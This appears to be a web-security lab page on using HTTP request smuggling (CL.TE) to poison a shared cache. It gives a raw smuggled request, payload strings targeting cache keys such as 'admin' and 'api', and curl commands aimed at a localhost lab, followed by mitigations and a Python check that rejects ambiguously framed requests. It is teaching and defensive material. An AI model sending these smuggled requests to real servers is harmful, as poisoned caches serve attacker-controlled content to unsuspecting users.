Lab 4: Cache Poisoning via Smuggling

Using request smuggling to poison caches and serve malicious content

Difficulty: High

Lab Overview

This lab demonstrates how HTTP Request Smuggling can be used to poison a shared cache so that it serves attacker-controlled content to other users. By smuggling a request whose path, query string and headers select a chosen cache key, an attacker can get the cache to store the response to that request and then serve it to legitimate users who ask for the same key.

Objective: Use request smuggling to poison the cache and serve malicious content to users.

Cache Poisoning Attack
// Cache Poisoning via Request Smuggling

// Step 1: Smuggle a request that poisons the cache
POST /4.php HTTP/1.1
Host: example.com
Content-Length: 13
Transfer-Encoding: chunked

0

GET /4.php?cache_key=homepage HTTP/1.1
Host: example.com
X-Cache-Key: homepage
Content-Length: 0

// Step 2: The smuggled request poisons the cache
// Step 3: Legitimate users get the poisoned content

// Example poisoned cache entry:
// Key: homepage
// Value: POISONED: 
Vulnerability Details
  • Type: HTTP Request Smuggling (Cache Poisoning)
  • Severity: Critical
  • Method: POST/GET
  • Issue: Cache poisoning via request smuggling
Test Payloads

Try these payloads in the request body:

  • 0\r\n\r\nGET /4.php?cache_key=homepage HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: homepage\r\nContent-Length: 0\r\n\r\n
  • 0\r\n\r\nGET /4.php?cache_key=admin HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: admin\r\nContent-Length: 0\r\n\r\n
  • 0\r\n\r\nGET /4.php?cache_key=api HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: api\r\nContent-Length: 0\r\n\r\n
Manual Testing with curl

Use these curl commands to test the vulnerability:

# Step 1: Poison the cache
curl -X POST http://localhost/test/http_rs/4.php \
  -H "Content-Length: 13" \
  -H "Transfer-Encoding: chunked" \
  -d "0

GET /4.php?cache_key=homepage HTTP/1.1
Host: example.com
X-Cache-Key: homepage
Content-Length: 0

"

# Step 2: Check if cache was poisoned
curl "http://localhost/test/http_rs/4.php?cache_key=homepage"
Real-World Attack Scenarios
Mitigation Strategies
  • Ensure consistent parsing between frontend and backend servers
  • Implement proper cache validation and sanitization
  • Use cache keys that are not controllable by users
  • Implement request validation and sanitization
  • Use reverse proxies that handle parsing consistently
  • Perform regular security testing and vulnerability assessments
  • Monitor for unusual request patterns and cache anomalies
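The first and third mitigations above, implemented as a small proxy-side check. This is an added example and not part of the lab's own code: it parses a raw HTTP/1.1 request, refuses any message whose body length can be read two ways (both Content-Length and Transfer-Encoding present, conflicting or wrong Content-Length), and derives the cache key only from Host, path and query, so an attacker-supplied X-Cache-Key header never influences what the cache stores under. The function names and the SMUGGLED sample below are constructed for this example; the sample reproduces the lab's CL.TE request.

```python
import hashlib
from urllib.parse import urlsplit

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body).
    Header names are lower-cased and kept as lists so repeats stay visible."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target, headers, body

def framing_problems(headers: dict, body: bytes) -> list:
    """Reasons a request must be rejected instead of forwarded. A message
    whose length can be read two ways is exactly what a CL.TE / TE.CL
    desync needs, so it is refused rather than "fixed up" and passed on."""
    problems = []
    cl = headers.get("content-length", [])
    te = headers.get("transfer-encoding", [])
    if cl and te:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl)) > 1:
        problems.append("conflicting Content-Length values")
    if cl and not te and (not cl[0].isdigit() or int(cl[0]) != len(body)):
        problems.append("Content-Length does not match body size")
    return problems

def cache_key(headers: dict, target: str) -> str:
    """Key built only from Host + path + query, which the proxy normalises
    itself; attacker-supplied headers such as X-Cache-Key are ignored."""
    host = headers.get("host", [""])[0].lower()
    parts = urlsplit(target)
    material = f"{host}|{parts.path or '/'}|{parts.query}"
    return hashlib.sha256(material.encode()).hexdigest()

# Constructed sample: the lab's CL.TE request carrying both framing headers.
SMUGGLED = (b"POST /4.php HTTP/1.1\r\nHost: example.com\r\nContent-Length: 13\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /4.php?cache_key=homepage"
            b" HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: homepage\r\nContent-Length: 0\r\n\r\n")

def check(raw: bytes):
    """Return (accepted, problems, key); key is None when the request is refused."""
    _method, target, headers, body = parse_request(raw)
    problems = framing_problems(headers, body)
    return (not problems, problems, None if problems else cache_key(headers, target))
```

Run against SMUGGLED the request is refused before any cache lookup happens; a clean GET with a spoofed X-Cache-Key header gets the same key as one without it.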